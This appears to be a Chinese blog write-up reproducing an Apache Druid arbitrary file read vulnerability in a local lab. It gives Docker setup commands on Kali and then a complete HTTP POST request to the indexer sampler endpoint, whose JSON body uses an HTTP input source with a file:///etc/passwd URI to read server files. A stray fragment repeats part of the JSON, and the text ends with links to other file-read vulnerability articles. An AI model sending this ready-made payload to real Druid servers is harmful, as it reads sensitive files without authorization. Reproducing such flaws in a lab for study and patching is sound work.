Apache Druid复现

描述

由于用户指定 HTTP InputSource 没有做出限制,可以通过将文件 URL 传递给 HTTP InputSource 来绕过应用程序级别的限制。攻击者可利用该漏洞在未授权情况下,构造恶意请求执行文件读取,最终造成服务器敏感性信息泄露。

kali 环境配置

安装https协议、CA证书、dirmngr

apt-get update

apt-get install -y apt-transport-https ca-certificates

apt-get install dirmngr

添加GPG密钥并添加更新源

curl -fsSL https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/gpg | sudo apt-key add -

echo ‘deb https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian/ buster stable’ | sudo tee /etc/apt/sources.list.d/docker.list

系统更新以及安装docker

apt-get update&&apt install docker-ce

启动docker服务器 和compose

service docker start || apt install docker-compose

访问网址:192.168.1.12:8888

url:file:///etc/passwd

burp抓包

修改burp请求包

POST /druid/indexer/v1/sampler?for=parser HTTP/1.1

Host: 192.168.1.12:8888

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: application/json, text/plain, /

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/json;charset=utf-8

Content-Length: 427

Origin: http://192.168.1.12:8888

Connection: close

Referer: http://192.168.1.12:8888/unified-console.html

{“type”:“index”,“spec”:{“type”:“index”,“ioConfig”:{“type”:“index”,“inputSource”:{“type”:“http”,“uris”:[“file:///etc/passwd”]},“inputFormat”:{“type”:“regex”,“pattern”:“(.*)”,“columns”:[“column1”]}},“dataSchema”:{“dataSource”:“sample”,“timestampSpec”:{“column”:“!!!no_such_column!!!”,“missingValue”:“1970-01-01T00:00:00Z”},“dimensionsSpec”:{}},“tuningConfig”:{“type”:“index”}},“samplerConfig”:{“numRows”:500,“timeoutMs”:15000}}

ig":{“type”:“index”}},“samplerConfig”:{“numRows”:500,“timeoutMs”:15000}}

Apache Druid LoadData 任意文件读取漏洞相关推荐

  1. Apache Solr任意文件读取漏洞复现

    Apache Solr任意文件读取漏洞复现 一.简介 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口.用户可以通过http请求,向搜索引擎服务器提交一定格 ...

  2. .exp文件_mini_httpd 任意文件读取漏洞(附EXP脚本)

    一.环境搭建: 进入镜像目录: cd vulhub/mini_httpd/CVE-2018-18778 启动环境: docker-compose up -d 访问8088端口 二.漏洞描述: Mini ...

  3. Grafana 中存在严重的未授权任意文件读取漏洞,已遭利用

     聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 Grafana Labs 发布紧急安全更新,修复了影响该公司主产品 Grafana 仪表盘中的严重漏洞 (CVE-2021-43798),CVS ...

  4. 【MetInfo任意文件读取】--任意文件读取漏洞

    文章目录 漏洞信息 一.漏洞产生的原因 二.漏洞利用 1.对靶机网址进行burp抓包 2.对上述请求包进行修改 三.漏洞修复与绕过--四种修复与绕过 1.置空../和./ 2.对$dir进行判断 3. ...

  5. 任意文件读取漏洞知识梳理

    文章目录 1.概述 2.开发语言触发点 2.1 PHP 2.2 Python 2.3 Java 2.4 Ruby 2.5 Node 3.中间件/服务器相关触发点 3.1 Nginx错误配置 3.2 数 ...

  6. 《从0到1:CTFer成长之路》1.3 任意文件读取漏洞

    文章目录 1.3.1 文件读取漏洞常见触发点 1.3.1.1 web语言 1. PHP 2.python 3.Java 4.Ruby 5.Node 1.3.1.2 中间件.服务件相关 1.Nginx错 ...

  7. Web漏洞-任意文件读取漏洞

    任意文件读取漏洞 原理 任意文件读取是属于文件操作漏洞的一种,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感文件,正常读取的文件没有经过 ...

  8. php 打开任意文件下载,TEC-004-php文件下载任意文件读取漏洞修复

    修改download?u参数值,将/public/files/14842030529.txt,替换为../../../../../../../../../../etc/passwd function ...

  9. 安全研究 | Jenkins 任意文件读取漏洞分析

    欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~ 本文由云鼎实验室 发表于云+社区专栏 一.漏洞背景 漏洞编号:CVE-2018-1999002 漏洞等级:高危 Jenkins 7 月 18 ...

最新文章

  1. Kattis - bela
  2. linux wc -l 对io,linux设备驱动归纳总结(五):2.操作硬件——IO内存
  3. 【模板小程序】求M~N范围内的质数个数
  4. Vim 的补全模式加速器,轻松玩转全部 15 种自动补全模式
  5. [Leedcode][JAVA][第136题][第137题][只出现一次的数字][位运算][HashSet][HashMap]
  6. android aptx固件,新增aptX蓝牙发射协议,M5固件首次升级!
  7. linux source 子shell,Linux------source
  8. Linux操作系统基础解析之(四)——Linux基本命令剖析(2)
  9. 学习 MFC 的好网站
  10. Linux下用户组、文件权限、更改目录下所有文件权限
  11. JS无刷新修改URL类似博客园翻页效果
  12. spark读写hive数据
  13. SAE J1939 协议源代码分析(二)-程序移植
  14. 刷机-升级到3.80M33的方法
  15. 微信小程序TabBar的使用
  16. 大数据挖掘与分析——用八爪鱼爬虫采集百度搜索内容
  17. png图片透明部分点击
  18. 买房子了~128.41平方哦`
  19. 【操作系统】CSAPP学习笔记
  20. 沈航计算机学院杨华,BCD码的加法.doc

热门文章

  1. 2016OSC源创会年终盛典-综合技术专场-George Neville-Neil
  2. 北大青鸟的班主任好当吗_【北大青鸟班主任就业前景怎么样|做北大青鸟班主任有前途吗】-看准网...
  3. [Alpha] Scrum Meeting 6 - TEAM LESS ERROR
  4. MA、WMA、EMA、EXPMA区别及公式详述
  5. 邂逅Flutter开发
  6. UINCODE字符串和安全字符串函数(好)
  7. Push failed Dst refspec V1.0.0 matches more than one.
  8. 暑假训练---三棱锥内切球公式及海伦公式
  9. java enum枚举型使用
  10. 函数有参无参真有很大区别吗?